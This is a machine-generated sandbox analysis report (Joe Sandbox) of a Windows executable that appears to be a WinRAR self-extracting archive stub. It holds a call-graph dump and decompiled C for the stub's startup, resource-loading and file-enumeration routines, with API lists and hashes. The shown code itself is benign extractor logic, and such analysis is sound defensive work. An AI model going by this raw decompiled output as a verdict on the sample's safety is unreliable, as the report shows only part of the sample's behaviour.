22 API calls 24973->24975 24978 3d17ce 24975->24978 24976 3d1767 24984 3d6ca7 75 API calls 24976->24984 24978->24982 24986 3d6ca7 75 API calls 24978->24986 24979->24982 24985 3d6ca7 75 API calls 24979->24985 24982->24967 24983->24976 24984->24972 24985->24982 24986->24982 24988 3dcf4d 24987->24988 24990 3dcf54 24987->24990 24989 3d981a 79 API calls 24988->24989 24989->24990 24990->24830 24991->24832 24993 3ede78 24992->24993 24994 3de617 53 API calls 24993->24994 24995 3ede9b 24994->24995 24996 3d4092 _swprintf 51 API calls 24995->24996 24997 3edead 24996->24997 24998 3ed4d4 16 API calls 24997->24998 24999 3e1b7c 24998->24999 24999->24786 25001 3d19bb 25000->25001 25002 3d19bf 25000->25002 25001->24839 25004 3d18f6 25002->25004 25005 3d1908 25004->25005 25006 3d1945 25004->25006 25007 3d3b2d 101 API calls 25005->25007 25012 3d3fa3 25006->25012 25009 3d1928 25007->25009 25009->25001 25016 3d3fac 25012->25016 25013 3d3b2d 101 API calls 25013->25016 25014 3d1966 25014->25009 25017 3d1e50 25014->25017 25016->25013 25016->25014 25029 3e0e08 25016->25029 25018 3d1e5a __EH_prolog 25017->25018 25037 3d3bba 25018->25037 25020 3d1e84 25021 3d1732 78 API calls 25020->25021 25023 3d1f0b 25020->25023 25022 3d1e9b 25021->25022 25065 3d18a9 78 API calls 25022->25065 25023->25009 25025 3d1eb3 25027 3d1ebf _wcslen 25025->25027 25066 3e1b84 MultiByteToWideChar 25025->25066 25067 3d18a9 78 API calls 25027->25067 25030 3e0e0f 25029->25030 25031 3e0e2a 25030->25031 25035 3d6c31 RaiseException CallUnexpected 25030->25035 25033 3e0e3b SetThreadExecutionState 25031->25033 25036 3d6c31 RaiseException CallUnexpected 25031->25036 25033->25016 25035->25031 25036->25033 25038 3d3bc4 __EH_prolog 25037->25038 25039 3d3bda 25038->25039 25040 3d3bf6 25038->25040 25093 3d138b 74 API calls 25039->25093 25041 3d3e51 25040->25041 25045 3d3c22 25040->25045 25118 3d138b 74 API calls 25041->25118 25044 3d3be5 25044->25020 25045->25044 25068 3e3377 25045->25068 25047 3d3ca3 25049 3d3d2e 25047->25049 25064 3d3c9a 25047->25064 25096 3dd051 25047->25096 25048 3d3c9f 25048->25047 25095 3d20bd 78 API calls 25048->25095 25078 3dab1a 25049->25078 25051 3d3c8f 25094 3d138b 74 API calls 25051->25094 25052 3d3c71 25052->25047 25052->25048 25052->25051 25053 3d3d41 25058 3d3dd7 25053->25058 25059 3d3dc7 25053->25059 25102 3e3020 25058->25102 25082 3d9215 25059->25082 25062 3d3dd5 25062->25064 25111 3d2021 74 API calls 25062->25111 25112 3e2297 25064->25112 25065->25025 25066->25027 25067->25023 25069 3e338c 25068->25069 25071 3e3396 ___std_exception_copy 25068->25071 25119 3d6ca7 75 API calls 25069->25119 25072 3e341c 25071->25072 25073 3e34c6 25071->25073 25077 3e3440 __cftof 25071->25077 25120 3e32aa 75 API calls 3 library calls 25072->25120 25121 3f238d RaiseException 25073->25121 25076 3e34f2 25077->25052 25079 3dab28 25078->25079 25081 3dab32 25078->25081 25080 3eeb38 8 API calls 25079->25080 25080->25081 25081->25053 25083 3d921f __EH_prolog 25082->25083 25122 3d7c64 25083->25122 25086 3d13ba 78 API calls 25087 3d9231 25086->25087 25125 3dd114 25087->25125 25089 3d928a 25089->25062 25090 3d9243 25090->25089 25092 3dd114 118 API calls 25090->25092 25134 3dd300 97 API calls __InternalCxxFrameHandler 25090->25134 25092->25090 25093->25044 25094->25064 25095->25047 25097 3dd084 25096->25097 25098 3dd072 25096->25098 25136 3d603a 82 API calls 25097->25136 25135 3d603a 82 API calls 25098->25135 25101 3dd07c 25101->25049 25103 3e3029 25102->25103 25104 3e3052 25102->25104 25105 3e3046 25103->25105 25107 3e3048 25103->25107 25108 3e303e 25103->25108 25104->25105 25151 3e552f 123 API calls 2 library calls 25104->25151 25105->25062 25150 3e624a 118 API calls 25107->25150 25137 3e6cdc 25108->25137 25111->25064 25113 3e22a1 25112->25113 25114 3e22ba 25113->25114 25117 3e22ce 25113->25117 25152 3e0eed 86 API calls 25114->25152 25116 3e22c1 25116->25117 25118->25044 25119->25071 25120->25077 25121->25076 25123 3db146 GetVersionExW 25122->25123 25124 3d7c69 25123->25124 25124->25086 25131 3dd12a __InternalCxxFrameHandler 25125->25131 25126 3dd29a 25127 3dd2ce 25126->25127 25128 3dd0cb 6 API calls 25126->25128 25129 3e0e08 SetThreadExecutionState RaiseException 25127->25129 25128->25127 25132 3dd291 25129->25132 25130 3e8c8d 103 API calls 25130->25131 25131->25126 25131->25130 25131->25132 25133 3dac05 91 API calls 25131->25133 25132->25090 25133->25131 25134->25090 25135->25101 25136->25101 25138 3e359e 75 API calls 25137->25138 25149 3e6ced __InternalCxxFrameHandler 25138->25149 25139 3dd114 118 API calls 25139->25149 25140 3e70fe 25141 3e5202 98 API calls 25140->25141 25142 3e710e __InternalCxxFrameHandler 25141->25142 25142->25105 25143 3e11cf 81 API calls 25143->25149 25144 3e3e0b 118 API calls 25144->25149 25145 3e7153 118 API calls 25145->25149 25146 3e0f86 88 API calls 25146->25149 25147 3e390d 98 API calls 25147->25149 25148 3e77ef 123 API calls 25148->25149 25149->25139 25149->25140 25149->25143 25149->25144 25149->25145 25149->25146 25149->25147 25149->25148 25150->25105 25151->25105 25152->25116 25153->24849 25154->24849 25155->24846 25157 3d5d2a 25156->25157 25202 3d5c4b 25157->25202 25160 3d5d5d 25161 3d5d95 25160->25161 25207 3db1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25160->25207 25161->24864 25163 3d8186 25162->25163 25164 3d8232 25163->25164 25214 3dbe5e 19 API calls __InternalCxxFrameHandler 25163->25214 25213 3e1fac CharUpperW 25164->25213 25167 3d823b 25167->24867 25169 3d7c22 25168->25169 25170 3d7c5a 25169->25170 25215 3d6e7a 74 API calls 25169->25215 25170->24877 25172 3d7c52 25216 3d138b 74 API calls 25172->25216 25174->24931 25176 3d9db3 25175->25176 25178 3d9dc2 25175->25178 25177 3d9db9 FlushFileBuffers 25176->25177 25176->25178 25177->25178 25179 3d9e3f SetFileTime 25178->25179 25179->24935 25180->24858 25181->24863 25182->24863 25183->24877 25184->24877 25185->24873 25186->24884 25187->24879 25188->24884 25190 3d98c5 GetFileType 25189->25190 25191 3d8b5a 25189->25191 25190->25191 25191->24899 25192 3d2021 74 API calls 25191->25192 25192->24897 25193->24899 25194->24901 25195->24925 25196->24925 25197->24925 25198->24925 25199->24929 25200->24938 25201->24928 25208 3d5b48 25202->25208 25204 3d5c6c 25204->25160 25206 3d5b48 2 API calls 25206->25204 25207->25160 25209 3d5b52 25208->25209 25211 3d5c3a 25209->25211 25212 3db1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25209->25212 25211->25204 25211->25206 25212->25209 25213->25167 25214->25164 25215->25172 25216->25170 25218 3dcef2 25217->25218 25223 3da99e 25218->25223 25220 3dcf24 25221 3da99e 86 API calls 25220->25221 25222 3dcf2f 25221->25222 25224 3da9c1 25223->25224 25227 3da9d5 25223->25227 25228 3e0eed 86 API calls 25224->25228 25226 3da9c8 25226->25227 25227->25220 25228->25226 25229->24946 25231 3da6a8 25230->25231 25232 3da727 FindNextFileW 25231->25232 25233 3da6c1 FindFirstFileW 25231->25233 25235 3da732 GetLastError 25232->25235 25240 3da709 25232->25240 25234 3da6d0 25233->25234 25233->25240 25236 3dbb03 GetCurrentDirectoryW 25234->25236 25235->25240 25237 3da6e0 25236->25237 25238 3da6fe GetLastError 25237->25238 25239 3da6e4 FindFirstFileW 25237->25239 25238->25240 25239->25238 25239->25240 25240->24797 25241->24606 25242->24610 25243->24610 25244->24613 25245->24618 25247 3d9f42 78 API calls 25246->25247 25248 3d1fe8 25247->25248 25249 3d1a04 101 API calls 25248->25249 25252 3d2005 25248->25252 25250 3d1ff5 25249->25250 25250->25252 25253 3d138b 74 API calls 25250->25253 25252->24627 25252->24628 25253->25252 25255 3eb5bc GetDlgItem 25254->25255 25256 3eb583 GetMessageW 25254->25256 25255->24638 25255->24639 25257 3eb5a8 TranslateMessage DispatchMessageW 25256->25257 25258 3eb599 IsDialogMessageW 25256->25258 25257->25255 25258->25255 25258->25257 25398 3e94e0 GetClientRect 25399 3ef2e0 46 API calls __RTC_Initialize 25447 3e21e0 26 API calls std::bad_exception::bad_exception 25400 3fbee0 GetCommandLineA GetCommandLineW 25401 4008a0 IsProcessorFeaturePresent 25402 3f0ada 51 API calls 2 library calls 25322 3d10d5 25327 3d5abd 25322->25327 25328 3d5ac7 __EH_prolog 25327->25328 25329 3db505 84 API calls 25328->25329 25330 3d5ad3 25329->25330 25334 3d5cac GetCurrentProcess GetProcessAffinityMask 25330->25334 25335 3ee2d7 25337 3ee1db 25335->25337 25336 3ee85d ___delayLoadHelper2@8 14 API calls 25336->25337 25337->25336 25403 3ef4d3 20 API calls 25340 3ee1d1 14 API calls ___delayLoadHelper2@8 25449 3fa3d0 21 API calls 2 library calls 25406 3e62ca 123 API calls __InternalCxxFrameHandler 25348 3edec2 25349 3edecf 25348->25349 25350 3de617 53 API calls 25349->25350 25351 3ededc 25350->25351 25352 3d4092 _swprintf 51 API calls 25351->25352 25353 3edef1 SetDlgItemTextW 25352->25353 25354 3eb568 5 API calls 25353->25354 25355 3edf0e 25354->25355 25451 3eb5c0 100 API calls 25452 3e77c0 118 API calls 25453 3effc0 RaiseException _com_error::_com_error CallUnexpected

                Executed Functions

                Function 003EDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 17%
                			E003EDF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t40;
				void* _t41;
				long _t50;
				void* _t53;
				intOrPtr _t57;
				struct HWND__* _t73;
				void* _t74;
				WCHAR* _t92;
				struct HINSTANCE__* _t93;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t120;

				_t120 = __fp0;
				_t86 = __edx;
				E003E0863(__edx, 1);
				E003EA64D("C:\Users\frontdesk\Desktop", 0x800);
				_t75 =  &_v208;
				E003EAC16( &_v208); // executed
				_t73 = 0;
				E003EFFF0(0x7104, 0x427b80, 0, 0x7104);
				_t101 = _t100 + 0xc;
				_t92 = GetCommandLineW();
				_t105 = _t92;
				if(_t92 != 0) {
					_push(_t92);
					E003EC5C4(0, _t105);
					if( *0x41a471 == 0) {
						E003EDBDE(__eflags, _t92);
					} else {
						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t98 != 0) {
							UnmapViewOfFile(_t74);
							_t73 = 0;
						}
						CloseHandle(_t98);
					}
				}
				GetModuleFileNameW(_t73, 0x42ec90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x42ec90); // executed
				GetLocalTime(_t101 + 0xc);
				_push( *(_t101 + 0x1a) & 0x0000ffff);
				_push( *(_t101 + 0x1c) & 0x0000ffff);
				_push( *(_t101 + 0x1e) & 0x0000ffff);
				_push( *(_t101 + 0x20) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				E003D4092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
				_t102 = _t101 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
				_t93 = GetModuleHandleW(_t73);
				 *0x41102c = _t93;
				 *0x411028 = _t93; // executed
				_t40 = LoadIconW(_t93, 0x64); // executed
				 *0x427b7c = _t40; // executed
				_t41 = E003EB6DD(_t75, _t86, _t120); // executed
				 *0x42ec84 = _t41;
				E003DDA42(0x411030, _t86, 0, 0x42ec90);
				E003E90B7(0);
				E003E90B7(0);
				 *0x418440 = _t102 + 0x5c;
				 *0x418444 = _t102 + 0x30; // executed
				DialogBoxParamW(_t93, L"STARTDLG", _t73, E003EB7E0, _t73); // executed
				 *0x418444 = _t73;
				 *0x418440 = _t73;
				E003E9178(_t102 + 0x24);
				E003E9178(_t102 + 0x50);
				_t50 =  *0x42fca8;
				if(_t50 != 0) {
					Sleep(_t50);
				}
				if( *0x419468 != 0) {
					E003EAE2F(0x42ec90);
				}
				E003DF279(0x427a78);
				if( *0x42fca0 > 0) {
					L003EEE5C( *0x42fc90);
				}
				DeleteObject( *0x427b7c);
				_t53 =  *0x42ec84;
				if(_t53 != 0) {
					DeleteObject(_t53);
				}
				if( *0x411098 == 0 &&  *0x418454 != 0) {
					E003D6D83(0x411098, 0xff);
				}
				_t54 =  *0x42fcac;
				 *0x418454 = 1;
				if( *0x42fcac != 0) {
					E003EDC3B(_t54);
					CloseHandle( *0x42fcac);
				}
				_t94 =  *0x411098;
				if( *0x427b7a != 0) {
					_t57 =  *0x40e728; // 0x3e8
					if( *0x427b7b == 0) {
						__eflags = _t57;
						if(_t57 < 0) {
							_t94 = _t94 - _t57;
							__eflags = _t94;
						}
					} else {
						_t94 =  *0x42fca4;
						if(_t57 > 0) {
							_t94 = _t94 + _t57;
						}
					}
				}
				E003EAC7C(_t102 + 0x1c); // executed
				return _t94;
			}





















                0x003edf1e
                0x003edf1e
                0x003edf29
                0x003edf38
                0x003edf3d
                0x003edf41
                0x003edf4b
                0x003edf54
                0x003edf59
                0x003edf62
                0x003edf64
                0x003edf66
                0x003edf68
                0x003edf69
                0x003edf74
                0x003edfe1
                0x003edf76
                0x003edf89
                0x003edf8d
                0x003edfce
                0x003edfd4
                0x003edfd4
                0x003edfd7
                0x003edfdd
                0x003edf74
                0x003edff2
                0x003edffe
                0x003ee009
                0x003ee014
                0x003ee01a
                0x003ee020
                0x003ee026
                0x003ee02c
                0x003ee032
                0x003ee048
                0x003ee04d
                0x003ee05a
                0x003ee067
                0x003ee06c
                0x003ee072
                0x003ee078
                0x003ee07e
                0x003ee083
                0x003ee08e
                0x003ee093
                0x003ee09c
                0x003ee0a5
                0x003ee0b5
                0x003ee0c4
                0x003ee0c9
                0x003ee0d3
                0x003ee0d9
                0x003ee0df
                0x003ee0e8
                0x003ee0ed
                0x003ee0f4
                0x003ee0f7
                0x003ee0f7
                0x003ee104
                0x003ee106
                0x003ee106
                0x003ee110
                0x003ee11c
                0x003ee124
                0x003ee129
                0x003ee130
                0x003ee136
                0x003ee13d
                0x003ee140
                0x003ee140
                0x003ee14d
                0x003ee162
                0x003ee162
                0x003ee167
                0x003ee16c
                0x003ee175
                0x003ee178
                0x003ee183
                0x003ee183
                0x003ee190
                0x003ee196
                0x003ee19f
                0x003ee1a4
                0x003ee1b4
                0x003ee1b6
                0x003ee1b8
                0x003ee1b8
                0x003ee1b8
                0x003ee1a6
                0x003ee1a6
                0x003ee1ae
                0x003ee1b0
                0x003ee1b0
                0x003ee1ae
                0x003ee1a4
                0x003ee1be
                0x003ee1ce

                APIs
                  • Part of subcall function 003E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 003E087C
                  • Part of subcall function 003E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003E088E
                  • Part of subcall function 003E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003E08BF
                  • Part of subcall function 003EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 003EA655
                  • Part of subcall function 003EAC16: OleInitialize.OLE32(00000000), ref: 003EAC2F
                  • Part of subcall function 003EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003EAC66
                  • Part of subcall function 003EAC16: SHGetMalloc.SHELL32(00418438), ref: 003EAC70
                • GetCommandLineW.KERNEL32 ref: 003EDF5C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003EDF83
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 003EDF94
                • UnmapViewOfFile.KERNEL32(00000000), ref: 003EDFCE
                  • Part of subcall function 003EDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 003EDBF4
                  • Part of subcall function 003EDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003EDC30
                • CloseHandle.KERNEL32(00000000), ref: 003EDFD7
                • GetModuleFileNameW.KERNEL32(00000000,0042EC90,00000800), ref: 003EDFF2
                • SetEnvironmentVariableW.KERNELBASE(sfxname,0042EC90), ref: 003EDFFE
                • GetLocalTime.KERNEL32(?), ref: 003EE009
                • _swprintf.LIBCMT ref: 003EE048
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003EE05A
                • GetModuleHandleW.KERNEL32(00000000), ref: 003EE061
                • LoadIconW.USER32(00000000,00000064), ref: 003EE078
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 003EE0C9
                • Sleep.KERNEL32(?), ref: 003EE0F7
                • DeleteObject.GDI32 ref: 003EE130
                • DeleteObject.GDI32(?), ref: 003EE140
                • CloseHandle.KERNEL32 ref: 003EE183
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzB
                • API String ID: 3049964643-3604125803
                • Opcode ID: 7ee65e9843f7165d0c70369739af1002e8d9ce34db4206042ee66f52d2a14502
                • Instruction ID: e78d2d7b2ee02ad9081f3e895b17c24a0b23ca287a866a19bfae0391d842b1c5
                • Opcode Fuzzy Hash: 7ee65e9843f7165d0c70369739af1002e8d9ce34db4206042ee66f52d2a14502
                • Instruction Fuzzy Hash: 4F613C71A043A4AFD322AF72EC49F6B3BACEB48705F40053AF905A61D1DB789D44C769
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 886 3ea6c2-3ea6df FindResourceW 887 3ea7db 886->887 888 3ea6e5-3ea6f6 SizeofResource 886->888 890 3ea7dd-3ea7e1 887->890 888->887 889 3ea6fc-3ea70b LoadResource 888->889 889->887 891 3ea711-3ea71c LockResource 889->891 891->887 892 3ea722-3ea737 GlobalAlloc 891->892 893 3ea73d-3ea746 GlobalLock 892->893 894 3ea7d3-3ea7d9 892->894 895 3ea7cc-3ea7cd GlobalFree 893->895 896 3ea74c-3ea76a call 3f0320 893->896 894->890 895->894 900 3ea76c-3ea78e call 3ea626 896->900 901 3ea7c5-3ea7c6 GlobalUnlock 896->901 900->901 906 3ea790-3ea798 900->906 901->895 907 3ea79a-3ea7ae GdipCreateHBITMAPFromBitmap 906->907 908 3ea7b3-3ea7c1 906->908 907->908 909 3ea7b0 907->909 908->901 909->908
                C-Code - Quality: 53%
                			E003EA6C2(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t27;
				char* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				long _t44;
				intOrPtr* _t45;
				struct HRSRC__* _t46;

				_t46 = FindResourceW( *0x411028, _a4, "PNG");
				if(_t46 == 0) {
					L15:
					return 0;
				}
				_t44 = SizeofResource( *0x411028, _t46);
				if(_t44 == 0) {
					goto L15;
				}
				_t17 = LoadResource( *0x411028, _t46);
				if(_t17 == 0) {
					goto L15;
				}
				_t18 = LockResource(_t17);
				_t47 = _t18;
				if(_t18 == 0) {
					goto L15;
				}
				_v4 = 0;
				_t19 = GlobalAlloc(2, _t44); // executed
				_t36 = _t19;
				if(_t36 == 0) {
					L14:
					return _v4;
				}
				if(GlobalLock(_t36) == 0) {
					L13:
					GlobalFree(_t36);
					goto L14;
				}
				E003F0320(_t21, _t47, _t44);
				_v8 = 0;
				_push( &_v8);
				_push(0);
				_push(_t36);
				if( *0x433180() == 0) {
					_t27 = E003EA626(_t25, _t38, _v20, 0); // executed
					_t39 = _v28;
					_t45 = _t27;
					 *0x403278(_t39);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45 + 8)) = 0;
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							_push(0xffffff);
							_t34 =  &_v20;
							_push(_t34);
							_push( *((intOrPtr*)(_t45 + 4)));
							L003EEB26(); // executed
							if(_t34 != 0) {
								 *((intOrPtr*)(_t45 + 8)) = _t34;
							}
						}
						 *0x403278(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
					}
				}
				GlobalUnlock(_t36);
				goto L13;
			}



















                0x003ea6db
                0x003ea6df
                0x003ea7db
                0x00000000
                0x003ea7db
                0x003ea6f2
                0x003ea6f6
                0x00000000
                0x00000000
                0x003ea703
                0x003ea70b
                0x00000000
                0x00000000
                0x003ea712
                0x003ea718
                0x003ea71c
                0x00000000
                0x00000000
                0x003ea729
                0x003ea72d
                0x003ea733
                0x003ea737
                0x003ea7d3
                0x00000000
                0x003ea7d8
                0x003ea746
                0x003ea7cc
                0x003ea7cd
                0x00000000
                0x003ea7cd
                0x003ea74f
                0x003ea757
                0x003ea75f
                0x003ea760
                0x003ea761
                0x003ea76a
                0x003ea771
                0x003ea776
                0x003ea77a
                0x003ea784
                0x003ea78a
                0x003ea78e
                0x003ea793
                0x003ea798
                0x003ea79a
                0x003ea79f
                0x003ea7a3
                0x003ea7a4
                0x003ea7a7
                0x003ea7ae
                0x003ea7b0
                0x003ea7b0
                0x003ea7ae
                0x003ea7bb
                0x003ea7c3
                0x003ea7c3
                0x003ea78e
                0x003ea7c6
                0x00000000

                APIs
                • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,003EB73D,00000066), ref: 003EA6D5
                • SizeofResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA6EC
                • LoadResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA703
                • LockResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA712
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,003EB73D,00000066), ref: 003EA72D
                • GlobalLock.KERNEL32 ref: 003EA73E
                • GlobalUnlock.KERNEL32(00000000), ref: 003EA7C6
                  • Part of subcall function 003EA626: GdipAlloc.GDIPLUS(00000010), ref: 003EA62C
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003EA7A7
                • GlobalFree.KERNEL32 ref: 003EA7CD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 541704414-364855578
                • Opcode ID: b7158d1648d3b8fde462868a9086dc81682faf8f7f6b61c90d56911dff4f0c44
                • Instruction ID: 177f09e7a02ac27e1fffb01f70383d7e320eca4b750809ccfe60f2f174e3aaa1
                • Opcode Fuzzy Hash: b7158d1648d3b8fde462868a9086dc81682faf8f7f6b61c90d56911dff4f0c44
                • Instruction Fuzzy Hash: AC310271600752AFC712DF62EC88D2B7FBCEF89751B010628F901966A0EB31ED00CAA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1035 3da69b-3da6bf call 3eec50 1038 3da727-3da730 FindNextFileW 1035->1038 1039 3da6c1-3da6ce FindFirstFileW 1035->1039 1041 3da742-3da7ff call 3e0602 call 3dc310 call 3e15da * 3 1038->1041 1042 3da732-3da740 GetLastError 1038->1042 1040 3da6d0-3da6e2 call 3dbb03 1039->1040 1039->1041 1050 3da6fe-3da707 GetLastError 1040->1050 1051 3da6e4-3da6fc FindFirstFileW 1040->1051 1048 3da804-3da811 1041->1048 1045 3da719-3da722 1042->1045 1045->1048 1053 3da709-3da70c 1050->1053 1054 3da717 1050->1054 1051->1041 1051->1050 1053->1054 1056 3da70e-3da711 1053->1056 1054->1045 1056->1054 1058 3da713-3da715 1056->1058 1058->1045
                C-Code - Quality: 81%
                			E003DA69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				int _t44;
				int _t49;
				signed int _t61;
				signed int _t62;
				void* _t63;
				long _t66;
				void* _t69;
				signed int _t78;
				void* _t79;
				intOrPtr _t80;
				void* _t81;

				E003EEC50(0x1250);
				_t81 = _a4;
				_t79 = _t78 | 0xffffffff;
				_push( &_v596);
				if(_t81 != _t79) {
					_t44 = FindNextFileW(_t81, ??);
					__eflags = _t44;
					if(_t44 != 0) {
						L12:
						_t80 = _a12;
						E003E0602(_t80, _a8, 0x800);
						_push(0x800);
						E003DC310(__eflags, _t80,  &(_v596.cFileName));
						_t49 = 0 + _v596.nFileSizeLow;
						__eflags = _t49;
						 *(_t80 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
						E003E15DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
						E003E15DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
						E003E15DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
						L13:
						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
						return _t81;
					}
					_t81 = _t79;
					_t61 = GetLastError();
					__eflags = _t61 - 0x12;
					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
					L9:
					_t80 = _a12;
					 *(_t80 + 0x1044) = _t62;
					goto L13;
				}
				_t63 = FindFirstFileW(_a8, ??); // executed
				_t81 = _t63;
				if(_t81 != _t79) {
					goto L12;
				}
				if(E003DBB03(_a8,  &_v4692, 0x800) == 0) {
					L4:
					_t66 = GetLastError();
					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = 1;
					}
					goto L9;
				}
				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
				_t81 = _t69;
				if(_t81 != _t79) {
					goto L12;
				}
				goto L4;
			}



















                0x003da6a3
                0x003da6aa
                0x003da6b4
                0x003da6bc
                0x003da6bf
                0x003da728
                0x003da72e
                0x003da730
                0x003da742
                0x003da742
                0x003da74a
                0x003da74f
                0x003da758
                0x003da765
                0x003da765
                0x003da76b
                0x003da777
                0x003da77a
                0x003da786
                0x003da792
                0x003da79e
                0x003da7aa
                0x003da7b6
                0x003da7c2
                0x003da7ce
                0x003da7db
                0x003da7ed
                0x003da7ff
                0x003da804
                0x003da804
                0x003da811
                0x003da811
                0x003da732
                0x003da734
                0x003da73a
                0x003da73d
                0x003da719
                0x003da719
                0x003da71c
                0x00000000
                0x003da71c
                0x003da6c4
                0x003da6ca
                0x003da6ce
                0x00000000
                0x00000000
                0x003da6e2
                0x003da6fe
                0x003da6fe
                0x003da707
                0x003da717
                0x003da717
                0x003da713
                0x003da713
                0x003da713
